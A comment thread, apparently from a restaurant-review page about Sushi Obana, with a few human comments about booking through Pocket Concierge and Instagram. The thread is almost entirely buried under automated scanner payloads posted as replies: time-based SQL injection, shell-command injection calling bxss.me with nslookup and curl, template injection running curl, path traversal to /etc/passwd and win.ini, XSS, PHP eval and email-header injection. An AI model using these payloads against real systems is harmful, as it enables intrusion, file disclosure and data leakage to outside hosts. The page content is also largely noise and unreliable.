)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Henry
';print(md5(31337));$a='
re: Henry
";print(md5(31337));$a="
re: Henry
HttP://bxss.me/t/xss.html?%00
re: Henry
"+"A".concat(70-3).concat(22*4).concat(117).concat(78).concat(115).concat(70)+(require"socket"
Socket.gethostbyname("hitgz"+"rrkxjhznfe20f.bxss.me.")[3].to_s)+"
re: Henry
${@print(md5(31337))}
re: Henry
'+'A'.concat(70-3).concat(22*4).concat(100).concat(88).concat(117).concat(65)+(require'socket'
Socket.gethostbyname('hitit'+'afykovwkf4f99.bxss.me.')[3].to_s)+'
re: Henry
bxss.me/t/xss.html?%00
re: Henry
'"
re: Henry
${@print(md5(31337))}\
re: Henry
<!--
re: Henry
'.print(md5(31337)).'
re: Henry
1RSAPGFPA0
re: Henry
response.write(9953547*9611464)
re: Henry
'+response.write(9953547*9611464)+'
re: Henry
"+response.write(9953547*9611464)+"
re: Henry
../../../../../../../../../../../../../../etc/passwd
re: Henry
../../../../../../../../../../../../../../windows/win.ini
re: Henry
file:///etc/passwd
re: Henry
<esi:include src="http://bxss.me/rpb.png"/>
re: Henry
${10000225+9999844}
re: Henry
../
re: Henry
)
re: Henry
redirtest.acx
re: Henry
!(()&&!|*|*|
re: Henry
^(#$!@#$)(()))******
re: Henry
echo vdhwbm$()\ uzwjjr\nz^xyu||a #' &echo vdhwbm$()\ uzwjjr\nz^xyu||a #|" &echo vdhwbm$()\ uzwjjr\nz^xyu||a #
re: Henry
'.gethostbyname(lc('hitiz'.'qsoqxrtwd717b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(72).chr(106).chr(70).'
re: Henry
&echo kyjzfv$()\ sscnuh\nz^xyu||a #' &echo kyjzfv$()\ sscnuh\nz^xyu||a #|" &echo kyjzfv$()\ sscnuh\nz^xyu||a #
re: Henry
".gethostbyname(lc("hitzx"."avdzzmgm20b33.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(65).chr(98).chr(75)."
re: Henry
|echo drdcrv$()\ syihss\nz^xyu||a #' |echo drdcrv$()\ syihss\nz^xyu||a #|" |echo drdcrv$()\ syihss\nz^xyu||a #
re: Henry
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Henry
gethostbyname(lc('hitpi'.'ghffgxnkb8072.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(73).chr(102).chr(66)
re: Henry
expr 9000255649 - 984281
re: Henry
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Henry
(nslookup -q=cname hitaxhanhnnks062a0.bxss.me||curl hitaxhanhnnks062a0.bxss.me))
re: Henry
/etc/shells
re: Henry
$(nslookup -q=cname hithgclhmwgoma4651.bxss.me||curl hithgclhmwgoma4651.bxss.me)
re: Henry
../../../../../../../../../../../../../../etc/shells
re: Henry
&nslookup -q=cname hitccpljjqehna489d.bxss.me&'\"`0&nslookup -q=cname hitccpljjqehna489d.bxss.me&`'
re: Henry
c:/windows/win.ini
re: Henry
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Henry
&(nslookup -q=cname hitipzthcwzqqa48de.bxss.me||curl hitipzthcwzqqa48de.bxss.me)&'\"`0&(nslookup -q=cname hitipzthcwzqqa48de.bxss.me||curl hitipzthcwzqqa48de.bxss.me)&`'
re: Henry
bxss.me
re: Henry
|(nslookup -q=cname hitfizautfxvmc9706.bxss.me||curl hitfizautfxvmc9706.bxss.me)
re: Henry
Http://bxss.me/t/fit.txt
re: Henry
`(nslookup -q=cname hitiaylsqfkii658ac.bxss.me||curl hitiaylsqfkii658ac.bxss.me)`
re: Henry
http://bxss.me/t/fit.txt?.jpg
re: Henry
;(nslookup -q=cname hitgzhzilqauqf29a2.bxss.me||curl hitgzhzilqauqf29a2.bxss.me)|(nslookup -q=cname hitgzhzilqauqf29a2.bxss.me||curl hitgzhzilqauqf29a2.bxss.me)&(nslookup -q=cname hitgzhzilqauqf29a2.bxss.me||curl hitgzhzilqauqf29a2.bxss.me)
re: Henry
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Henry
|(nslookup${IFS}-q${IFS}cname${IFS}hitnawfvqxyxhe7ebe.bxss.me||curl${IFS}hitnawfvqxyxhe7ebe.bxss.me)
re: Henry
';print(md5(31337));$a='
re: Henry
'"()
re: Henry
&(nslookup${IFS}-q${IFS}cname${IFS}hitphceaxxttvb1bc1.bxss.me||curl${IFS}hitphceaxxttvb1bc1.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitphceaxxttvb1bc1.bxss.me||curl${IFS}hitphceaxxttvb1bc1.bxss.me)&`'
re: Henry
";print(md5(31337));$a="
re: Henry
'&&sleep(27*1000)*uksoji&&'
re: Henry
${@print(md5(31337))}
re: Henry
"&&sleep(27*1000)*lolpvx&&"
re: Henry
${@print(md5(31337))}\
re: Henry
'||sleep(27*1000)*puwwwm||'
re: Henry
'.print(md5(31337)).'
re: Henry
"||sleep(27*1000)*uldgzj||"
re: Henry
HttP://bxss.me/t/xss.html?%00
re: Henry
bxss.me/t/xss.html?%00
re: Henry
"+"A".concat(70-3).concat(22*4).concat(100).concat(87).concat(118).concat(83)+(require"socket"
Socket.gethostbyname("hitjm"+"llqnvxub2cc5c.bxss.me.")[3].to_s)+"
re: Henry
'+'A'.concat(70-3).concat(22*4).concat(98).concat(90).concat(101).concat(80)+(require'socket'
Socket.gethostbyname('hitcn'+'atvtztveb02f1.bxss.me.')[3].to_s)+'
re: Henry
'A'.concat(70-3).concat(22*4).concat(118).concat(72).concat(105).concat(67)+(require'socket'
Socket.gethostbyname('hitzj'+'mamitjcv22c0b.bxss.me.')[3].to_s)
re: Henry
replies
re: Henry
'"
re: Henry
replies�
re: Henry
<!--
re: Henry
replies/.
re: Henry
'"()&%<zzz><ScRiPt >iRou(9111)</ScRiPt>
re: Henry
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hittyevhzfosq586ae.bxss.me")}}
re: Henry
'"()&%<zzz><ScRiPt >iRou(9525)</ScRiPt>
re: Henry
9622372
re: Henry
U6Hmlcl3
re: Henry
*1
re: Henry
*1
re: Henry
*1
re: Henry
*1
re: Henry
-1 OR 5*5=25 --
re: Henry
-1 OR 5*5=26 --
re: Henry
-1 OR 5*5=25
re: Henry
-1 OR 5*5=26
re: Henry
*if(now()=sysdate(),sleep(15),0)
re: Henry
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Henry
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Henry
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Henry
-1; waitfor delay '0:0:15' --
re: Henry
-1); waitfor delay '0:0:15' --
re: Henry
-1 waitfor delay '0:0:15' --
re: Henry
nOUslEMs'; waitfor delay '0:0:15' --
re: Henry
-1 OR 196=(SELECT 196 FROM PG_SLEEP(15))--
re: Henry
-1) OR 414=(SELECT 414 FROM PG_SLEEP(15))--
re: Henry
-1)) OR 507=(SELECT 507 FROM PG_SLEEP(15))--
re: Henry
QJvo2LPJ' OR 961=(SELECT 961 FROM PG_SLEEP(15))--
re: Henry
JhPefotk') OR 832=(SELECT 832 FROM PG_SLEEP(15))--
re: Henry
nlk3NlCZ')) OR 740=(SELECT 740 FROM PG_SLEEP(15))--
re: Henry
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Henry
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Henry
'||(select 1 from (select pg_sleep(15))x)||'
re: Henry
''||(select 1 from (select pg_sleep(15))x)||''
re: Henry
'"
re: Henry
@@kCw7S
re: Henry
(select 198766*667891)
re: Henry
(select 198766*667891 from DUAL)
Message them on IG on your preferred dates.
https://instagram.com/sushi_obana?igshid=MmJiY2I4NDBkZg==
re: guest
EcpMDCo9
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+216-216-1=0+0+0+1
re: guest
-1 OR 3+216-216-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Y7LFRCfD'; waitfor delay '0:0:15' --
re: guest
-5 OR 770=(SELECT 770 FROM PG_SLEEP(15))--
re: guest
-5) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: guest
-1)) OR 384=(SELECT 384 FROM PG_SLEEP(15))--
re: guest
eS6psEsJ' OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: guest
iia1tYq7') OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: guest
rMW0w232')) OR 628=(SELECT 628 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@D5VQI
re: guest
lXcC8xzW
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+858-858-1=0+0+0+1
re: guest
-1 OR 3+858-858-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
rJLyatvO'; waitfor delay '0:0:15' --
re: guest
-5 OR 782=(SELECT 782 FROM PG_SLEEP(15))--
re: guest
-5) OR 412=(SELECT 412 FROM PG_SLEEP(15))--
re: guest
-1)) OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: guest
EG2fBuei' OR 16=(SELECT 16 FROM PG_SLEEP(15))--
re: guest
Bo0ZIY9q') OR 688=(SELECT 688 FROM PG_SLEEP(15))--
re: guest
VYapRgPA')) OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@W5n4r
re: guest
17N4BSM3G0
re: guest
response.write(9959638*9069548)
re: guest
'+response.write(9959638*9069548)+'
re: guest
"+response.write(9959638*9069548)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${10000277+10000056}
re: guest
../
re: guest
)
re: guest
redirtest.acx
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
'.gethostbyname(lc('hitim'.'xxmdtvuj9faa3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(86).chr(120).chr(67).'
re: guest
".gethostbyname(lc("hitbo"."ocdevflwbb260.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(65).chr(122).chr(82)."
re: guest
echo pbriek$()\ rmoyzv\nz^xyu||a #' &echo pbriek$()\ rmoyzv\nz^xyu||a #|" &echo pbriek$()\ rmoyzv\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
gethostbyname(lc('hitwb'.'vkrvdrreae7f3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(84).chr(108).chr(73)
re: guest
&echo skfdkf$()\ icphjj\nz^xyu||a #' &echo skfdkf$()\ icphjj\nz^xyu||a #|" &echo skfdkf$()\ icphjj\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
|echo dgubrp$()\ aiolha\nz^xyu||a #' |echo dgubrp$()\ aiolha\nz^xyu||a #|" |echo dgubrp$()\ aiolha\nz^xyu||a #
re: guest
/etc/shells
re: guest
expr 9000819159 - 955340
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
(nslookup -q=cname hitzxfmqdugxzb661d.bxss.me||curl hitzxfmqdugxzb661d.bxss.me))
re: guest
c:/windows/win.ini
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
$(nslookup -q=cname hitsysirxhpsb94a3a.bxss.me||curl hitsysirxhpsb94a3a.bxss.me)
re: guest
bxss.me
re: guest
&nslookup -q=cname hitucfqshdjwr44668.bxss.me&'\"`0&nslookup -q=cname hitucfqshdjwr44668.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
&(nslookup -q=cname hitgdzsqeinow098fe.bxss.me||curl hitgdzsqeinow098fe.bxss.me)&'\"`0&(nslookup -q=cname hitgdzsqeinow098fe.bxss.me||curl hitgdzsqeinow098fe.bxss.me)&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hitetbpmjclmp06a29.bxss.me||curl hitetbpmjclmp06a29.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
`(nslookup -q=cname hitjofhfyejowf7e9c.bxss.me||curl hitjofhfyejowf7e9c.bxss.me)`
re: guest
'"()
re: guest
';print(md5(31337));$a='
re: guest
;(nslookup -q=cname hitddttnztlgx511ae.bxss.me||curl hitddttnztlgx511ae.bxss.me)|(nslookup -q=cname hitddttnztlgx511ae.bxss.me||curl hitddttnztlgx511ae.bxss.me)&(nslookup -q=cname hitddttnztlgx511ae.bxss.me||curl hitddttnztlgx511ae.bxss.me)
re: guest
'&&sleep(27*1000)*dbzcob&&'
re: guest
";print(md5(31337));$a="
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitoqobdiaavk30be8.bxss.me||curl${IFS}hitoqobdiaavk30be8.bxss.me)
re: guest
"&&sleep(27*1000)*bjildl&&"
re: guest
${@print(md5(31337))}
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitzovwenfsdka3d78.bxss.me||curl${IFS}hitzovwenfsdka3d78.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzovwenfsdka3d78.bxss.me||curl${IFS}hitzovwenfsdka3d78.bxss.me)&`'
re: guest
'||sleep(27*1000)*npofym||'
re: guest
${@print(md5(31337))}\
re: guest
"||sleep(27*1000)*brwklq||"
re: guest
'.print(md5(31337)).'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(102).concat(77).concat(112).concat(66)+(require"socket"
Socket.gethostbyname("hitdr"+"ebejvlhx96b9f.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(120).concat(82).concat(121).concat(89)+(require'socket'
Socket.gethostbyname('hitgr'+'gkgynufp95876.bxss.me.')[3].to_s)+'
re: guest
replies
re: guest
'A'.concat(70-3).concat(22*4).concat(108).concat(65).concat(97).concat(82)+(require'socket'
Socket.gethostbyname('hitao'+'cjlkrpev1aac0.bxss.me.')[3].to_s)
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >L09y(9740)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbpvpptrbyh1e47a.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >L09y(9993)</ScRiPt>
re: guest
9012638
re: guest
4rCwbcIO
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
RVVaQFmi'; waitfor delay '0:0:15' --
re: guest
-1 OR 952=(SELECT 952 FROM PG_SLEEP(15))--
re: guest
-1) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: guest
-1)) OR 837=(SELECT 837 FROM PG_SLEEP(15))--
re: guest
AuYObplW' OR 843=(SELECT 843 FROM PG_SLEEP(15))--
re: guest
gQsJ4nee') OR 899=(SELECT 899 FROM PG_SLEEP(15))--
re: guest
8e9rbdu3')) OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@KCZvM
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
@Henry Sorry, I don't know if there's a way to receive notifications on posts I've commented on and I don't check the site often.
I explained everything in my post.
I made a booking request through Pocket Concierge. Then messaged Obana on Instagram. Then Pocket Concierge came back to me with a confirmed reservation.
re: gomaizo
SXFOomPl
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+905-905-1=0+0+0+1
re: gomaizo
-1 OR 3+905-905-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
9HISEwAx'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 34=(SELECT 34 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 53=(SELECT 53 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 264=(SELECT 264 FROM PG_SLEEP(15))--
re: gomaizo
FKGxn41j' OR 563=(SELECT 563 FROM PG_SLEEP(15))--
re: gomaizo
t4CkAUXi') OR 861=(SELECT 861 FROM PG_SLEEP(15))--
re: gomaizo
C5jxFpGP')) OR 849=(SELECT 849 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@gCrB1
re: gomaizo
Fa17V59s
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+69-69-1=0+0+0+1
re: gomaizo
-1 OR 3+69-69-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
LQqhbKjx'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 95=(SELECT 95 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 693=(SELECT 693 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: gomaizo
aq0cx2vx' OR 901=(SELECT 901 FROM PG_SLEEP(15))--
re: gomaizo
rDitietu') OR 750=(SELECT 750 FROM PG_SLEEP(15))--
re: gomaizo
tTEzSHvK')) OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@fuDhz
re: gomaizo
1B5dvznNF6O
re: gomaizo
%0abcc:074625.67-22179.67.41618.19990.2@bxss.me
re: gomaizo
to@example.com>%0d%0abcc:074625.67-22180.67.41618.19990.2@bxss.me
re: gomaizo
response.write(9348667*9423883)
re: gomaizo
'+response.write(9348667*9423883)+'
re: gomaizo
"+response.write(9348667*9423883)+"
re: gomaizo
<esi:include src="http://bxss.me/rpb.png"/>
re: gomaizo
../../../../../../../../../../../../../../etc/passwd
re: gomaizo
${9999774+9999616}
re: gomaizo
../../../../../../../../../../../../../../windows/win.ini
re: gomaizo
file:///etc/passwd
re: gomaizo
../../../../../../../../../../../../../../../proc/version
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: gomaizo
../../../../../../../../../../etc/passwd%00.jpg
re: gomaizo
)
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: gomaizo
!(()&&!|*|*|
re: gomaizo
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: gomaizo
^(#$!@#$)(()))******
re: gomaizo
'.gethostbyname(lc('hitlo'.'iylfwfou96fc7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(68).chr(107).chr(89).'
re: gomaizo
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: gomaizo
".gethostbyname(lc("hitew"."shjvtdia8435b.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(69).chr(102).chr(77)."
re: gomaizo
/etc/passwd
re: gomaizo
echo wtzqgi$()\ rsutoo\nz^xyu||a #' &echo wtzqgi$()\ rsutoo\nz^xyu||a #|" &echo wtzqgi$()\ rsutoo\nz^xyu||a #
re: gomaizo
%2fetc%2fpasswd
re: gomaizo
&echo ehiaal$()\ rrsjco\nz^xyu||a #' &echo ehiaal$()\ rrsjco\nz^xyu||a #|" &echo ehiaal$()\ rrsjco\nz^xyu||a #
re: gomaizo
/.././.././.././.././.././.././.././../etc/./passwd%00
re: gomaizo
|echo xjtluq$()\ nqgbuj\nz^xyu||a #' |echo xjtluq$()\ nqgbuj\nz^xyu||a #|" |echo xjtluq$()\ nqgbuj\nz^xyu||a #
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: gomaizo
(nslookup hitxvvtpxyxpy6c24b.bxss.me||perl -e "gethostbyname('hitxvvtpxyxpy6c24b.bxss.me')")
re: gomaizo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: gomaizo
$(nslookup hithuynljbibn0d05b.bxss.me||perl -e "gethostbyname('hithuynljbibn0d05b.bxss.me')")
re: gomaizo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: gomaizo
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: gomaizo
&nslookup hitjpthzuaddec090a.bxss.me&'\"`0&nslookup hitjpthzuaddec090a.bxss.me&`'
re: gomaizo
Http://bxss.me/t/fit.txt
re: gomaizo
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: gomaizo
&(nslookup hitwgedyxaguy04b21.bxss.me||perl -e "gethostbyname('hitwgedyxaguy04b21.bxss.me')")&'\"`0&(nslookup hitwgedyxaguy04b21.bxss.me||perl -e "gethostbyname('hitwgedyxaguy04b21.bxss.me')")&`'
re: gomaizo
http://bxss.me/t/fit.txt%3F.jpg
re: gomaizo
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: gomaizo
HttP://bxss.me/t/xss.html?%00
re: gomaizo
|(nslookup hitzxghqmikhab33cc.bxss.me||perl -e "gethostbyname('hitzxghqmikhab33cc.bxss.me')")
re: gomaizo
"+"A".concat(70-3).concat(22*4).concat(113).concat(74).concat(99).concat(84)+(require"socket"
Socket.gethostbyname("hitnp"+"ejchmlfjcbc29.bxss.me.")[3].to_s)+"
re: gomaizo
/etc/shells
re: gomaizo
file:///etc/passwd
re: gomaizo
bxss.me/t/xss.html?%00
re: gomaizo
`(nslookup hitomybhschesdbcbc.bxss.me||perl -e "gethostbyname('hitomybhschesdbcbc.bxss.me')")`
re: gomaizo
'+'A'.concat(70-3).concat(22*4).concat(108).concat(89).concat(117).concat(71)+(require'socket'
Socket.gethostbyname('hitxj'+'uhypxjsfb9d32.bxss.me.')[3].to_s)+'
re: gomaizo
c:/windows/win.ini
re: gomaizo
/\../\../\../\../\../\../\../etc/passwd
re: gomaizo
;(nslookup hittptkedzunc383b7.bxss.me||perl -e "gethostbyname('hittptkedzunc383b7.bxss.me')")|(nslookup hittptkedzunc383b7.bxss.me||perl -e "gethostbyname('hittptkedzunc383b7.bxss.me')")&(nslookup hittptkedzunc383b7.bxss.me||perl -e "gethostbyname('hittptkedzunc383b7.bxss.me')")
re: gomaizo
bxss.me
re: gomaizo
/WEB-INF/web.xml
re: gomaizo
C:\WINDOWS\system32\drivers\etc\hosts
re: gomaizo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: gomaizo
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: gomaizo
../../../../../../../../../../windows/win.ini%00.jpg
re: gomaizo
';print(md5(31337));$a='
re: gomaizo
/../../../../../../../../../../boot.ini
re: gomaizo
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: gomaizo
";print(md5(31337));$a="
re: gomaizo
'"
re: gomaizo
..\..\..\..\..\..\..\..\windows\win.ini
re: gomaizo
${@print(md5(31337))}
re: gomaizo
<!--
re: gomaizo
